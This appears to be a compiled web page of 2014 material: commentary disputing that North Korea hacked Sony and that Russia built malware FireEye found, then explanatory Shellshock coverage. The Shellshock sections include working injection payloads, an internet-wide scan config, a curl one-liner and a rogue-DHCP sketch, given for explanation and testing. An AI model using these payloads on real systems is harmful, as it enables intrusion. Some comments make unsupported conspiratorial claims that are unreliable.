Also, there have been no reviews of the film, either positive or negative. For a movie that looked as bad as the one shown in the previews I saw, this could be what saves the box office. I can see no possible advantage for NK to invest the resources into hacking Sony over a second-rate comic movie. Who would get an advantage from the Sony hack? I'll bet a lot of Symantec licenses will be renewed before the end of the year. Sorry, just free-associating here. If I had mod points you'd get an insightful.
smaddox (928261) on Wednesday December 24, 2014 @07:51PM (#48670503)
Re: Occam's Razor (Score:2)
Your objections are easily explained away as a false flag operation initiated by an individual or group.
jrumney (197329) on Wednesday December 24, 2014 @09:34PM (#48670883) Homepage
Re:Occam's Razor (Score:2)
In order to say CIA hacked Sony, you would have to invent all sorts of motives and cover-up to explain it. The simpler explanation is that N. Korea did it, because the circumstances and evidence so far all point to it.
You mean the motives and cover-up the media has so far invented all point to it. An even simpler explanation is that disgruntled hacker groups reused some attack code, perhaps from an attack on South Korean companies a few weeks back which maybe North Korea paid them to deploy.
The narrative about The Interview being motivation for the attack didn't come out until long after the attacks, and was initially denied by the contacts the media had made; it was only a few days later that statements from the supposed hackers started mentioning it. This was likely after the disgruntled hackers realized that it made a better back story than the fact that they were just being assholes, and would likely deflect law enforcement attention away from them if it became widely believed.
[Dec 24, 2014] Sony Hack - Likely Inside Attacker Found - Obama Claim Discredited
"...It follows the pattern. In 2002, when the U.S. broke the Geneva agreement which froze the North Korean nuclear program, the US accused North Korea of secretly engaging in u1ranium enrichment."
"...The whole purpose of the demonization in the MSM of North Korea is to justify the Asian pivot, which is actually about containment of China. The establishment believes it best to not tell the "useful idiots" in the general population so they're using North Korea so as to "protect" the clueless public."
"...P2Asia promised 60:40% realignment to Pacific Theater, from current 40;60%, but (in writing) without Atlantic Theater reduction in forces. No base closures. No redeployments. Pure Mil.Gov Stage 5 Metastasis, from 40:60% to 90:60% as it were, the greatest expansion since to Cold War, and Ukraine:Syria was just an Atlanticist chess move to ensure this will be massive. The only thing the US produces today is bad cars, and military and financial weapons of mass destruction. The Cheneyites will ensure the P2Asia $100sBs all get looted away on IDIQNB contracts. The Gang of Eight 40,000,000 'Blue Visa' Immigration Service Class Bill actually stated in the legislation 'No Bid', together with a New Federal Secret Police, and Rendition SuperMax Prisons in evert State. Together with McHealthcare, McEducatiin, McWar and McPrisons"
"..."Cui bono? Who benefits from framing North Korea?" The same people who will benefit or who did benefit from framing Serbia, Russia, Syria, Iran, or Libya ? Just a guess."
Moon of Alabama
The U.S. claims, with zero reliable evidence, that Sony was hacked by North Korea. The NYT editors believed that Weapon of Mass Destruction claim and called for action against North Korea. MoA, like others, seriously doubted the story the Obama regime told:
The tools to hack the company are well known and in the public domain. The company, Sony, had lousy internal network security and had been hacked before. The hackers probably had some inside knowledge. They used servers in Bolivia, China and South Korea to infiltrate. There is zero public evidence that the hack was state sponsored. The later "explanation" of the "evidence" by the FBI was unconvincing. Now a serious security company claims to have identified the real hacker:
Kurt Stammberger, a senior vice president with cybersecurity firm Norse, told CBS News his company has data that casts doubt on some of the FBI's findings. "Sony was not just hacked, this is a company that was essentially nuked from the inside," said Stammberger.
...
"We are very confident that this was not an attack master-minded by North Korea and that insiders were key to the implementation of one of the most devastating attacks in history," said Stammberger.He says Norse data is pointing towards a woman who calls herself "Lena" and claims to be connected with the so-called "Guardians of Peace" hacking group. Norse believes it's identified this woman as someone who worked at Sony in Los Angeles for ten years until leaving the company this past May.
"This woman was in precisely the right position and had the deep technical background she would need to locate the specific servers that were compromised," Stammberger told me.
The piece also points out that the original demand by the hackers was for money and had nothing to do with an unfunny Sony movie that depicts the murder of the head of a nation state.
Attributing cyber-attacks, if possible at all, is a difficult process which usually ends with uncertain conclusions. Without further evidence it will often be wrong.
That a person has now been identified with the insider knowledge and possible motive for the hack, and without any connection to North Korea, makes the Obama administration's claim of North Korean "guilt" even less reliable.
It now seems likely that Obama, to start a conflict with North Korea, just lied about the "evidence" like the Bush administration lied about "Saddam's WMD". The NYT editors were, in both cases, childishly gullible or complicit in the crime.
Puppet Master | Dec 24, 2014 3:43:16 AM | 1
It follows the pattern. In 2002, when the U.S. broke the Geneva agreement which froze the North Korean nuclear program, the US accused North Korea of secretly engaging in uranium enrichment.
It turned out that the intelligence the US had about it was less than certain.
http://www.nytimes.com/2007/03/01/washington/01korea.html?pagewanted=print&_r=0
March 1, 2007
U.S. Had Doubts on North Korean Uranium Drive

The public revelation of the intelligence agencies’ doubts, which have been brewing for some time, came almost by happenstance. In a little-noticed exchange on Tuesday at a hearing at the Senate Armed Services Committee, Joseph DeTrani, a longtime intelligence official, told Senator Jack Reed of Rhode Island that “we still have confidence that the program is in existence — at the mid-confidence level.” Under the intelligence agencies’ own definitions, that level “means the information is interpreted in various ways, we have alternative views” or it is not fully corroborated.
Too late. North Korea had already conducted its first nuclear weapon test in 2006.
All the lies and ploys were meant to force North Korea into developing nuclear weapons, which was exactly what the neocons wanted.
http://www.washingtonpost.com/wp-dyn/content/article/2006/10/21/AR2006102100296.html
At many points, the United States found itself at odds with other partners in the six-party process, such as China and South Korea, which repeatedly urged the Bush administration to show more flexibility in its tactics. Meanwhile, administration officials were often divided on North Korea policy, with some wanting to engage the country and others wanting to isolate it.

Before North Korea announced it had detonated a nuclear device, some senior officials even said they were quietly rooting for a test, believing that would finally clarify the debate within the administration.
Why do they do that?
Not about North Korea, but to catch China.

North Korea is just a trap the US has been carefully preparing for a long time to catch China, by maintaining a crisis spot on the Chinese border, and keeping South Korea and Japan in the US orbit and away from China.
For the US, North Korea plays the same geopolitical role as Ukraine. As Ukraine is a geopolitical wedge between Russia and Europe, North Korea is the geopolitical wedge between China and Japan.
One good thing now is that their ploy is becoming more transparent and unraveling more quickly.
P Walker | Dec 24, 2014 10:16:59 AM | 8
The whole purpose of the demonization in the MSM of North Korea is to justify the Asian pivot, which is actually about containment of China. The establishment believes it best to not tell the "useful idiots" in the general population so they're using North Korea so as to "protect" the clueless public.
Chip Nihk | Dec 24, 2014 6:34:03 PM | 10
It goes a little deeper.
P2Asia promised 60:40% realignment to Pacific Theater, from the current 40:60%, but (in writing) without Atlantic Theater reduction in forces. No base closures. No redeployments. Pure Mil.Gov Stage 5 Metastasis, from 40:60% to 90:60% as it were, the greatest expansion since the Cold War, and Ukraine:Syria was just an Atlanticist chess move to ensure this will be massive. The only thing the US produces today is bad cars, and military and financial weapons of mass destruction. The Cheneyites will ensure the P2Asia $100sBs all get looted away on IDIQNB contracts. The Gang of Eight 40,000,000 'Blue Visa' Immigration Service Class Bill actually stated in the legislation 'No Bid', together with a New Federal Secret Police, and Rendition SuperMax Prisons in every State. Together with McHealthcare, McEducation, McWar and McPrisons.
nomas | Dec 24, 2014 7:36:18 PM | 11
Obama along with the rest of the U.S. executive and State apparatus are, by all the evidence, pathological liars.
nomas | Dec 24, 2014 7:46:28 PM | 14
@ anon @ 4: "Cui bono? Who benefits from framing North Korea?"
The same people who will benefit or who did benefit from framing Serbia, Russia, Syria, Iran, or Libya ? Just a guess.
[Nov 02, 2014] Russian Hackers Are Fiendishly Smart. Good Thing For America They’re So Stupid
Talleyrand used to say "A married man with a family will do anything for money". This is especially true about some security company employees...
Oct 29, 2014 | http://marknesop.wordpress.com
Anyway, before we range too far afield to find our way back, let’s look at the Wall Street Journal article. Just keep in the back of your mind that the “experts” who say the trail leads straight back to the Russian government might well be a couple of college dropouts who spend the rest of their time playing World Of Warcraft.
Security wizards FireEye, a cybersecurity firm based in California, discovered “a sophisticated cyberweapon, able to evade detection and hop between computers walled off from the Internet” in a U.S. system. This brilliant piece of sleuthware, we further learn, “was programmed on Russian-language machines and built during working hours in Moscow.”
Stupid, stupid Russians. They went to all the trouble to bore and stroke that baby until it was humming with super-secret code power, and then pointed a trail right back to the Rodina by writing their code in Cyrillic. And, moreover, betrayed themselves even more convincingly by writing all this code during working hours in Moscow. Or Amman, Jordan, which shares the same time zone. Or Baghdad. Or Damascus, or Dar es Salaam. Djibouti. Nairobi. Simferopol. Or perhaps the code was written by somebody outside working hours. Is there some evidence that compelled investigators to think the work of writing spy code has to be done between the hours of 9:00 AM and 5:00 PM?
Their confidential report is due to be released Tuesday, so I guess we’ll have to wait to find out. Oh, wait – no, we won’t, because they told the Wall Street Journal (the world’s biggest fucking blabbermouths), and they posted a link to it. They’re calling this mysterious group “APT-28”. Because “Dirty Moskali Masterminded By Putin”, while it looked great on the cover, cost more to print – and we all have to think about costs these days – and sort of lacked the techno-wallop they were looking for.
I don’t want to spoil the report for you, because it is a ripping read, but I have to say up front that a lot of the circumstantial evidence which causes FireEye to blame this snooping on Russia is summed up in an assessment by one of their managers – a former Russia analyst for the U.S. Department of Defense, by a wonderful coincidence: “Who else benefits from this? It just looks so much like something that comes from Russia that we can’t avoid the conclusion.”
I see. Well, by God, that is evidence, no denying that. It just looks like Russia. Probably because they were stupid enough to code in Cyrillic, even though almost everyone codes in English regardless of where they’re from, because almost all programming languages are in English, because most popular frameworks and third-party extensions are written in English, because Cyrillic characters are not allowed when naming many functions and variables, and….gee, I’m sure there was something else….oh, yeah: and because using Cyrillic would be a dead giveaway that the source was Russian, and it would be indescribably stupid to write brilliant code that it would take a top-notch security hired gun to find, and then leave the root code in Cyrillic. The article is at pains to imply the Russians are the world’s most clever hackers. Sure hope they don’t find out how stupid it is to write their code in Russian, or they might really start achieving some success.
But this sneaky program was written during working hours in Moscow, and the information it sought to exploit would only be of interest to the Russian government; that’s how FireEye broke the whole thing wide open, and they’ve been onto the Russians for seven years, ever since they prefaced their invasion of Georgia with a cyber-attack on Georgia’s systems, and ultimately made Saakashvili eat his tie.
Hey, I can think of somebody else who is interested in as much information as it can get on U.S. governmental inner workings, policymaking and current financial situation. Israel. And what do you know? Jerusalem is only an hour off of Moscow time. I’m not suggesting it must have been Israel instead of Russia – perish the thought. But I hope I have adequately expressed my contempt for the doughheaded theory that it must have been Moscow because sneaky writers of dirty code adhere to regular office hours. Just sayin’.
Incidentally, the United States Foreign Agent Registration Act (FARA) has never been enforced against Israel, and in 2012 an amendment was introduced which (paraphrased) reads “The Attorney General may, by regulation, provide for the exemption..[if the AG] determines that such registration…is not necessary…”
After all, Israel has a long and colourful history of spying on the United States. In the early 80’s the FBI investigated AIPAC for long-running espionage and theft of government documents relating to the United States – Israel Free Trade Pact: because Israel had a purloined copy of the USA’s negotiating positions, the story goes, the USA was unable to exploit anything to its advantage because the Israelis already knew what the Americans would concede under pressure: “A quarter-century after the tainted negotiations led to passage of the US-Israel preferential trade pact, it remains the most unfavourable of all U.S. bilateral trade agreements, producing chronic deficits, lack of U.S. market access to Israel and ongoing theft of U.S. intellectual property.“
Defense department stuff? Sure, they were interested in that, too. In 2005 Larry Franklin, Steven Rosen and Keith Weissman were indicted in Virginia for passing classified documents to a foreign power (Israel, although they danced around who it was by referring to it as simply “a Middle Eastern Country”) which were tremendously useful to Israel in its attempts to maneuver the USA into war with Iran on its behalf. Franklin plead guilty and received a 12-year prison sentence which was later – incredibly – reduced to 100 hours of community service and 10 months in a halfway house. All charges against Rosen and Weissman, lobbyists for AIPAC, were dropped in 2009. The United States government claimed it did not want classified material revealed at trial. So dangerous, not to put too fine a point on it, that it was better to let the criminals who had given that classified information to a foreign power go free without punishment than to risk Americans learning it who had no need to know.
Nor was that the only instance. Johnathan Pollard, an analyst with U.S. Naval Intelligence Command, was convicted of spying for Israel and sentenced to life imprisonment. That sentence has waffled back and forth, largely due to intense efforts by agencies of the Israeli government to get it commuted, and currently stands at release just about a year from now. Israel acknowledged that Pollard had spied for that country on its ally in a formal apology, and the Victim Impact Statement hints that the information which was passed endangered both American lives and the USA’s relations with its Arab allies. Details were never made public, and remain classified. However, as the referenced article points out, Israel today enjoys real-time intelligence sharing with the USA, so I guess spying on America is not really all that important after all – what’s FireEye ki-yiing about?
U.S. Navy submariner Ariel Weinmann was arrested and detained as a spy for Israel in 2006 when he reportedly deserted from his unit (USS ALBUQUERQUE) taking with him a laptop computer which held classified information. He was believed to have met with an agent of a foreign power in Vienna and in Mexico City. Initial reports said that power was Israel. Later, after the allies had time to get their heads together and agree on a cover story, Time Magazine broke a story which put it out there, with no substantiation whatsoever, that the foreign power implicated had actually been – wait for it – Russia. He probably had just become confused because Jerusalem and Moscow have almost the same working hours. Weinmann is apparently not Jewish, by the way, the name is of German extraction, or so his father says. He was alleged, by his father, to have been upset because of the USA collecting intelligence information on its allies. So, if you’re still following the storyline, Weinmann – after a naval deployment to the Persian Gulf where the Navy upset him by collecting intelligence information on its allies – stole a laptop containing classified information which presumably proved his case, and disclosed that information to…Russia. Uh huh. A nation which is not only not an ally of the United States – pretty damned far from it, in fact – but one which has no serious naval profile in the Persian Gulf. I feel kind of like I’m running on a giant pretzel.
More recently, in May of this year, Newsweek announced despairingly that Israel will not stop spying on the USA, and the USA will not make them stop. In this article, which accuses Israel of constantly maneuvering to steal American technology and industrial secrets, Israel’s espionage activities are described as “unrivaled and unseemly”. Comically, Israeli Embassy spokesman Aaron Sagui retorted angrily, “Israel doesn’t conduct espionage operations in the United States, period. We condemn the fact that such outrageous, false allegations are being directed against Israel.” No word on whether his nose immediately grew so rapidly that it put the reporter’s eye out, because Israel has already admitted to and apologized for espionage activities in the United States before.
Which brings us back to FireEye, speaking of Pinocchio. FireEye, frankly, needs a big break. Its stock is sinking as other Threat Detection commercial security companies muscle in on the market, and in May was down 65% from a 52-week high, while investors were getting impatient to see some success.
A success like this one, in fact.
Let’s go back a minute to the giddy summary by the FireEye executive cited earlier. “Who else benefits from this? It just looks so much like something that comes from Russia that we can’t avoid the conclusion.”
You know why the conclusion is unavoidable? Because the malicious code is specifically engineered to point in that direction. Who would do that? Russians who meant it to be undetectable?
You tell me.
[Oct 03, 2014] Everything you need to know about the Shellshock Bash bug
September 25, 2014 | troyhunt.com
Remember Heartbleed? If you believe the hype today, Shellshock is in that league and with an equally awesome name, albeit bereft of a cool logo (someone in the marketing department of these vulns needs to get on that). But in all seriousness, it does have the potential to be a biggie, and as I did with Heartbleed, I wanted to put together something definitive, both for me to get to grips with the situation and for others to dissect the hype from the true underlying risk.

To set the scene, let me share some content from Robert Graham’s blog post; he has been doing some excellent analysis on this. Imagine an HTTP request like this:
target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header = Cookie:() { :; }; ping -c 3 209.126.230.74
http-header = Host:() { :; }; ping -c 3 209.126.230.74
http-header = Referer:() { :; }; ping -c 3 209.126.230.74

Which, when issued against a range of vulnerable IP addresses, results in a stream of ping responses arriving at 209.126.230.74 from every host that executed the embedded command.
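The scan config above simply stuffs the payload into three ordinary request headers. To probe a single host rather than a range, the equivalent one-liner would look something like this (the target host and CGI path here are hypothetical; 209.126.230.74 is the listener from the scan above):

curl -A '() { :; }; ping -c 3 209.126.230.74' http://target.example.com/cgi-bin/status
# -A sets the User-Agent header; a vulnerable CGI endpoint imports the
# "function definition" from the header and runs the trailing ping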
[Oct 03, 2014] Shellshock (software bug)
en.wikipedia.org
Analysis of the source code history of Bash shows that the vulnerabilities had existed undiscovered since approximately version 1.13 in 1992.[4] The maintainers of the Bash source code have difficulty pinpointing the time of introduction due to the lack of comprehensive changelogs.[1]
In Unix-based operating systems, and in other operating systems that Bash supports, each running program has its own list of name/value pairs called environment variables. When one program starts another program, it provides an initial list of environment variables for the new program.[14] Separately from these, Bash also maintains an internal list of functions, which are named scripts that can be executed from within the program.[15] Since Bash operates both as a command interpreter and as a command, it is possible to execute Bash from within itself. When this happens, the original instance can export environment variables and function definitions into the new instance.[16] Function definitions are exported by encoding them within the environment variable list as variables whose values begin with parentheses ("()") followed by a function definition. The new instance of Bash, upon starting, scans its environment variable list for values in this format and converts them back into internal functions. It performs this conversion by creating a fragment of code from the value and executing it, thereby creating the function "on-the-fly", but affected versions do not verify that the fragment is a valid function definition.[17] Therefore, given the opportunity to execute Bash with a chosen value in its environment variable list, an attacker can execute arbitrary commands or exploit other bugs that may exist in Bash's command interpreter.
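As a minimal sketch of that import mechanism (the variable name "greet" is arbitrary), this is how a function crosses from parent to child on a pre-Shellshock Bash; patched versions refuse the import instead:

env greet='() { echo "hello from an imported function"; }' bash -c greet
# a pre-Shellshock child Bash reconstructs greet from the environment and
# prints the message; a patched Bash reports "greet: command not found"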
The name "shellshock" is attributed[by whom?][not in citation given] to Andreas Lindh from a tweet on 24 September 2014.non-primary source needed]
On 1 October, Zalewski released details of the final bugs and confirmed that Florian Weimer's patch does indeed prevent them.
CGI-based web server attack
When a web server uses the Common Gateway Interface (CGI) to handle a document request, it passes various details of the request to a handler program in the environment variable list. For example, the variable HTTP_USER_AGENT has a value that, in normal usage, identifies the program sending the request. If the request handler is a Bash script, or if it executes one, for example using the system(3) call, Bash will receive the environment variables passed by the server and will process them as described above. This provides a means for an attacker to trigger the Shellshock vulnerability with a specially crafted server request.[4] The security documentation for the widely used Apache web server states: "CGI scripts can ... be extremely dangerous if they are not carefully checked",[20] and for that reason other methods of handling web server requests are often used. There are a number of online services which attempt to test the vulnerability against web servers exposed to the Internet.
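To make that concrete, here is a minimal, hypothetical Bash CGI handler of the vulnerable kind. Nothing in the script itself is malicious; the exposure comes from the web server copying request headers into environment variables before the script starts, which a vulnerable Bash then parses:

#!/bin/bash
# hypothetical /cgi-bin/status handler; by the time this runs, the server
# has already exported HTTP_USER_AGENT, HTTP_COOKIE, etc. into the environment
echo "Content-Type: text/plain"
echo
echo "server time: $(date)"

A request whose User-Agent value begins with "() { :; };" followed by arbitrary commands would execute those commands with the web server's privileges on an unpatched system.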
SSH server example
OpenSSH has a "ForceCommand" feature, where a fixed command is executed when the user logs in, instead of just running an unrestricted command shell. The fixed command is executed even if the user specified that another command should be run; in that case the original command is put into the environment variable "SSH_ORIGINAL_COMMAND". When the forced command is run in a Bash shell (if the user's shell is set to Bash), the Bash shell will parse the SSH_ORIGINAL_COMMAND environment variable on start-up, and run the commands embedded in it. The user has used their restricted shell access to gain unrestricted shell access, using the Shellshock bug.[21]
DHCP example
Some DHCP clients can also pass commands to Bash; a vulnerable system could be attacked when connecting to an open Wi-Fi network. A DHCP client typically requests and gets an IP address from a DHCP server, but it can also be provided a series of additional options. A malicious DHCP server could provide, in one of these options, a string crafted to execute code on a vulnerable workstation or laptop.[9]
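A heavily hedged sketch of such a rogue server, built with dnsmasq (the interface, address range, and choice of option 114 are assumptions; which options a given client copies into the environment of its Bash-based configuration scripts varies by platform):

dnsmasq --interface=eth0 \
  --dhcp-range=192.168.66.50,192.168.66.100,12h \
  --dhcp-option-force=114,"() { :; }; ping -c 3 192.168.66.1"
# a vulnerable client that exports this option would execute the embedded
# ping when its configuration script invokes Bash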
Note of offline system vulnerability
The bug can potentially affect machines that are not directly connected to the Internet when they perform offline processing that involves Bash.
Initial report (CVE-2014-6271)
This original form of the vulnerability involves a specially crafted environment variable containing an exported function definition, followed by arbitrary commands. Bash incorrectly executes the trailing commands when it imports the function.[22] The vulnerability can be tested with the following command:
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

In systems affected by the vulnerability, the above command will display the word "vulnerable" as a result of Bash executing the command "echo vulnerable", which was embedded into the specially crafted environment variable named "x".[24]
There was an initial report of the bug made to the maintainers of Bash (Report# CVE-2014-6271). The bug was corrected with a patch to the program. However, after the release of the patch there were subsequent reports of different, yet related vulnerabilities. On 26 September 2014, two open-source contributors, David A. Wheeler and Norihiro Tanaka, noted that there were additional issues, even after patching systems using the most recently available patches. In an email addressed to the oss-sec list and the bash bug list, Wheeler wrote: "This patch just continues the 'whack-a-mole' job of fixing parsing errors that began with the first patch. Bash's parser is certain [to] have many many many other vulnerabilities".[25]
On 27 September 2014, Michał Zalewski announced his discovery of several other Bash vulnerabilities,[26] one based upon the fact that Bash is typically compiled without address space layout randomization (ASLR).[27] Zalewski also strongly encouraged all concerned to immediately apply a patch made available by Florian Weimer.[27]

CVE-2014-6277
CVE-2014-6277 relates to the parsing of function definitions in environment variables by Bash. It was discovered by Michał Zalewski.[29]
The following input causes a segfault:

() { x() { _; }; x() { _; } <<a; }
CVE-2014-6278
CVE-2014-6278 relates to the parsing of function definitions in environment variables by Bash. It was discovered by Michał Zalewski.[29]
Unlike CVE-2014-6277, this one permits direct command execution. The following input demonstrates the issue; on a vulnerable system the embedded commands ("echo hi mom; id") are executed:

() { _; } >_[$($())] { echo hi mom; id; }
CVE-2014-7169
On the same day the bug was published, Tavis Ormandy discovered a related bug which was assigned the CVE identifier CVE-2014-7169.[21] Official and distributed patches for this began to be released on 26 September 2014. It is demonstrated in the following code:
env X='() { (a)=>\' sh -c "echo date"; cat echo
which would trigger a bug in Bash to execute the command "date" unintentionally. This would become CVE-2014-7169.[21]
- Testing example
Here is an example of a system that has a patch for CVE-2014-6271 but not CVE-2014-7169:
$ X='() { (a)=>\' bash -c "echo date"
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
$ cat echo
Fri Sep 26 01:37:16 UTC 2014

The patched system displays the same error, notifying the user that CVE-2014-6271 has been prevented. However, the attack causes the writing of a file named 'echo' into the working directory, containing the result of the 'date' call. The existence of this issue resulted in the creation of CVE-2014-7169 and the release of patches for several systems.
A system patched for both CVE-2014-6271 and CVE-2014-7169 will simply echo the word "date" and the file "echo" will not be created.
$ X='() { (a)=>\' bash -c "echo date"
date
$ cat echo
cat: echo: No such file or directory

CVE-2014-7186
CVE-2014-7186 relates to an out-of-bounds memory access error in the Bash parser code.[31] While working on patching Shellshock, Red Hat researcher Florian Weimer found this bug.[23]
- Testing example
Here is an example of the vulnerability, which leverages the use of multiple "<<EOF" declarations:
bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"
- A vulnerable system will echo the text "CVE-2014-7186 vulnerable, redir_stack".
CVE-2014-7187
CVE-2014-7187 relates to an off-by-one error, allowing out-of-bounds memory access, in the Bash parser code.[32] While working on patching Shellshock, Red Hat researcher Florian Weimer found this bug.[23]
- Testing example
Here is an example of the vulnerability, which leverages the use of multiple "done" declarations:
(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"
- A vulnerable system will echo the text "CVE-2014-7187 vulnerable, word_lineno".
Frequently Asked Questions about the Shellshock Bash flaws
Sep 26, 2014 | securityblog.redhat.com
Why are there four CVE assignments?
The original flaw in Bash was assigned CVE-2014-6271. Shortly after that issue went public a researcher found a similar flaw that wasn’t blocked by the first fix and this was assigned CVE-2014-7169. Later, Red Hat Product Security researcher Florian Weimer found additional problems and they were assigned CVE-2014-7186 and CVE-2014-7187. It’s possible that other issues will be found in the future and assigned a CVE designator even if they are blocked by the existing patches.
... ... ...
Why is Red Hat using a different patch than others?

Our patch addresses the CVE-2014-7169 issue in a much better way than the upstream patch; we wanted to make sure the issue was properly dealt with.
I have deployed web application filters to block CVE-2014-6271. Are these filters also effective against the subsequent flaws?

If configured properly and applied to all relevant places, the “() {” signature will work against these additional flaws.
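One quick, if crude, way to see whether you are already being probed is to search web server logs for that same signature. A minimal sketch, assuming a combined log format that records the User-Agent and Referer headers (log paths vary by distribution):

grep '() {' /var/log/apache2/access.log /var/log/httpd/access_log 2>/dev/null
# a hit only shows that someone sent the Shellshock prefix in a request;
# it does not by itself mean the attempt succeeded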
Does SELinux help protect against this flaw?
SELinux can help reduce the impact of some of the exploits for this issue. SELinux guru Dan Walsh has written about this in depth in his blog.
Are you aware of any new ways to exploit this issue?
Within a few hours of the first issue being public (CVE-2014-6271), various exploits were seen live; they attacked the services we identified as at risk in our first post:
- from dhclient,
- CGI serving web servers,
- sshd+ForceCommand configuration,
- git repositories.
We did not see any exploits which were targeted at servers which had the first issue fixed, but were affected by the second issue. We are currently not aware of any exploits which target bash packages which have both CVE patches applied.
Why wasn’t this flaw noticed sooner?
The flaws in Bash were in a quite obscure feature that was rarely used; it is not surprising that this code had not been given much attention. When the first flaw was discovered it was reported responsibly to vendors who worked over a period of under 2 weeks to address the issue.
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
Update 2014-09-25 16:00 UTC

Red Hat is aware that the patch for CVE-2014-6271 is incomplete. An attacker can provide specially-crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions. The new issue has been assigned CVE-2014-7169. We are working on patches in conjunction with the upstream developers as a critical priority. For details on a workaround, please see the knowledgebase article.
Red Hat advises customers to upgrade to the version of Bash which contains the fix for CVE-2014-6271 and not wait for the patch which fixes CVE-2014-7169. CVE-2014-7169 is a less severe issue and patches for it are being worked on.
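On RHEL and its derivatives, picking up the fixed package is a one-line operation; a minimal sketch (the exact fixed version string varies by advisory and product):

yum update bash   # pull the patched package from the configured repositories
rpm -q bash       # then compare the installed version against the advisory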
Bash, or the Bourne-again shell, is a Unix-like shell and perhaps one of the most widely installed utilities on any Linux system. From its creation in 1989, Bash has evolved from a simple terminal-based command interpreter to many other fancy uses.
In Linux, environment variables provide a way to influence the behavior of software on the system. They typically consist of a name which has a value assigned to it. The same is true of the Bash shell. It is common for many programs to run a Bash shell in the background. It is often used to provide a shell to a remote user (via ssh or telnet, for example), to provide a parser for CGI scripts (Apache, etc.), or even to provide limited command execution support (git, etc.).
Coming back to the topic, the vulnerability arises from the fact that you can create environment variables with specially-crafted values before calling the Bash shell. These variables can contain code, which gets executed as soon as the shell is invoked. The name of these crafted variables does not matter, only their contents. As a result, this vulnerability is exposed in many contexts, for example:
- ForceCommand is used in sshd configs to provide limited command execution capabilities for remote users. This flaw can be used to bypass that and provide arbitrary command execution. Some Git and Subversion deployments use such restricted shells. Regular use of OpenSSH is not affected because users already have shell access.
- Apache servers using mod_cgi or mod_cgid are affected if CGI scripts are either written in Bash or spawn subshells. Such subshells are implicitly used by system/popen in C, by os.system/os.popen in Python, by system/exec in PHP (when run in CGI mode), and by open/system in Perl if a shell is used (which depends on the command string).
- PHP scripts executed with mod_php are not affected even if they spawn subshells.
- DHCP clients invoke shell scripts to configure the system, with values taken from a potentially malicious server. This would allow arbitrary commands to be run, typically as root, on the DHCP client machine.
- Various daemons and SUID/privileged programs may execute shell scripts with environment variable values set / influenced by the user, which would allow for arbitrary commands to be run.
- Any other application which is hooked onto a shell or runs a shell script as using Bash as the interpreter. Shell scripts which do not export variables are not vulnerable to this issue, even if they process untrusted content and store it in (unexported) shell variables and open subshells.
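The distinction in that last point is easy to demonstrate. Only values that are actually exported into a child's environment can trigger the bug; a sketch, with the dangerous behavior shown for a vulnerable Bash:

# stored but NOT exported: the payload never reaches the child's environment
x='() { :;}; echo injected'
bash -c 'echo child is clean'

# exported: a vulnerable child Bash runs the trailing command at start-up
export x
bash -c 'echo child started'   # a vulnerable Bash first prints "injected"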
Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these Bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the environment variable). Something like:
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test

The patch used to fix this flaw ensures that no code is allowed after the end of a Bash function. So if you run the above example with the patched version of Bash, you should get an output similar to:
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test

We believe this should not affect any backward compatibility. This would, of course, affect any scripts which try to use environment variables created in the way described above, but doing so should be considered a bad programming practice.
Red Hat has issued security advisories that fix this issue for Red Hat Enterprise Linux. Fedora has also shipped packages that fix this issue.
We have additional information regarding specific Red Hat products affected by this issue that can be found at https://access.redhat.com/site/solutions/1207723
Information on CentOS can be found at http://lists.centos.org/pipermail/centos/2014-September/146099.html.
[Sep 29, 2014] Shellshock: How to protect your Unix, Linux and Mac servers By Steven J. Vaughan-Nichols
Fortunately, all the major Linux vendors quickly issued patches, including Debian, Ubuntu, Suse and Red Hat.
zdnet.com
The only thing you have to fear with Shellshock, the Unix/Linux Bash security hole, is fear itself. Yes, Shellshock can serve as a highway for worms and malware to hit your Unix, Linux, and Mac servers, but you can defend against it.
The real and present danger is for servers. According to the National Institute of Standards (NIST), Shellshock scores a perfect 10 for potential impact and exploitability. Red Hat reports that the most common attack vectors are:
- httpd (Your Web server): CGI [Common-Gateway Interface] scripts are likely affected by this issue: when a CGI script is run by the web server, it uses environment variables to pass data to the script. These environment variables can be controlled by the attacker. If the CGI script calls Bash, the script could execute arbitrary code as the httpd user. mod_php, mod_perl, and mod_python do not use environment variables and we believe they are not affected.
- Secure Shell (SSH): It is not uncommon to restrict remote commands that a user can run via SSH, such as rsync or git. In these instances, this issue can be used to execute any command, not just the restricted command.
- dhclient: The Dynamic Host Configuration Protocol Client (dhclient) is used to automatically obtain network configuration information via DHCP. This client uses various environment variables and runs Bash to configure the network interface. Connecting to a malicious DHCP server could allow an attacker to run arbitrary code on the client machine.
- CUPS (Linux, Unix and Mac OS X's print server): It is believed that CUPS is affected by this issue. Various user-supplied values are stored in environment variables when CUPS filters are executed.
- sudo: Commands run via sudo are not affected by this issue. Sudo specifically looks for environment variables that are also functions. It could still be possible for the running command to set an environment variable that could cause a Bash child process to execute arbitrary code.
- Firefox: We do not believe Firefox can be forced to set an environment variable in a manner that would allow Bash to run arbitrary commands. It is still advisable to upgrade Bash as it is common to install various plug-ins and extensions that could allow this behavior.
- Postfix: The Postfix [mail] server will replace various characters with a ?. While the Postfix server does call Bash in a variety of ways, we do not believe an arbitrary environment variable can be set by the server. It is however possible that a filter could set environment variables.
So much for Red Hat's thoughts. Of these, the Web servers and SSH are the ones that worry me the most. The DHCP client is also troublesome, especially if, as is the case with small businesses, your external router doubles as your Internet gateway and DHCP server.
